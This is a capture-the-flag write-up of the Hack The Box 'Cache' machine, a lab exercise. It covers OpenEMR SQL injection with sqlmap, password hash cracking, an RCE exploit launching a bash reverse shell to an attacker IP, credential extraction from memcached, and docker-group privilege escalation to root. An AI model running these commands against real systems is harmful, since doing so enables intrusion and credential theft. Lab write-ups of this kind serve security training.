Posts Cache Writeup [HTB]
Post
Cancel

Cache Writeup [HTB]

Cache is a linux machine rated as medium from Hack The Box, it consists on enumerating to find another website running OpenEMR, then pivoting to a user with credentials obtained from the initial web and finally obtain root access by exploiting memcached and abusing docker group privileges.

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
  nmap -sC -sV 10.10.10.188
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-04 15:41 CEST
Nmap scan report for 10.10.10.188
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 we find the following page : Web

There is a login page but we do not have credentials, inspecting the source code there is a jquery function visible which contains the credentials:

Web

We can login but it is a rabbithole Web

Then, enumerating the web we find an about page and see that the author has other project called hms, we can add it to /etc/hosts as hms.htb : Web

Visiting we discover it is running OpenEmr

Web

Exploitation

I found a youtube PoC exploit for it

I try to create a user as the PoC and then save the following request :

1
2
3
4
5
6
7
8
9
10
cat request.txt
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=nc6uq0oms8l5hcqja5cg7fkpul; PHPSESSID=q7ftl9ojp1vaej54d4esd4phlo
Upgrade-Insecure-Requests: 1

Using sqlmap and the previous request, databases can be enumerated :

1
2
3
4
sqlmap -r request.txt --threads=10 --dbs
available databases [2]                                                                                            
[*] information_schema
[*] openemr

Now we dump tables:

1
2
3
4
5
sqlmap -r request.txt --threads=10 -D openemr --tables
user_settings                         
| users                                 
| users_facility                       
| users_secure

users_secure seems to be the table we are looking , we will dump its contents:

1
sqlmap -r request.txt --threads=10 -D openemr -T users_secure --dump

From it we obtain openemr_admin and a hashed password : $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.

This password will be cracked with john:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
?:xxxxxx
1 password hash cracked, 0 left
```hms
Now that we have credentials we can use the following RCE exploit to obtain a reverse shell : <https://www.exploit-db.com/exploits/45161>:

```shell
python openemr.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.46/443 0>&1'
.---.  ,---.  ,---.  .-. .-.,---.          ,---.    
/ .-. ) | .-.\ | .-'  |  \| || .-'  |\    /|| .-.\   
| | |(_)| |-' )| `-.  |   | || `-.  |(\  / || `-'/   
| | | | | |--' | .-'  | |\  || .-'  (_)\/  ||   (    
\ `-' / | |    |  `--.| | |)||  `--.| \  / || |\ \   
)---'  /(     /( __.'/(  (_)/( __.'| |\/| ||_| \)\  
(_)    (__)   (__)   (__)   (__)    '-'  '-'    (__)

  ={   P R O J E C T    I N S E C U R I T Y   }=    

        Twitter : @Insecurity                       
        Site    : insecurity.sh                     

[$] Authenticating with openemr_admin:xxxxxx
[$] Injecting payload

And we obtain a reverse shell as www-data:

1
2
3
4
5
6
7
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.10.188] 36386
bash: cannot set terminal process group (1811): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/interface/main$ whoami
www-data

User ash is available in the system so we can su into him with the credentials found in the website:

1
2
3
4
www-data@cache:/home$ su ash
Password:
ash@cache:/home$ whoami
ash

Privilege Escalation

Listing services running locally found port 11211 open :

1
2
3
4
5
6
7
8
ash@cache:/home$ ss -tnl
State    Recv-Q    Send-Q        Local Address:Port        Peer Address:Port    
LISTEN   0         80                127.0.0.1:3306             0.0.0.0:*       
LISTEN   0         128               127.0.0.1:11211            0.0.0.0:*       
LISTEN   0         128           127.0.0.53%lo:53               0.0.0.0:*       
LISTEN   0         128                 0.0.0.0:22               0.0.0.0:*       
LISTEN   0         128                       *:80                     *:*       
LISTEN   0         128                    [::]:22                  [::]:*

This port corresponds to memcached from which we can dump stored data.

We can connect to it through telnet :

1
2
3
4
5
6
7
8
9
10
11
12
13
ash@cache:/home$ telnet localhost 11211
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END

Then, we can retrieve the user and password :

1
2
3
4
5
6
7
8
get user
VALUE user 0 5
luffy
END
get passwd
VALUE passwd 0 9
0n3_p1ec3
END

With this credentials we can login as luffy via ssh:

1
ssh luffy@10.10.10.188

After having logged in we see user luffy belongs to the docker group :

1
2
luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

A root shell can be obtained following gtfobins

1
2
3
4
5
luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
This post is licensed under CC BY 4.0 by the author.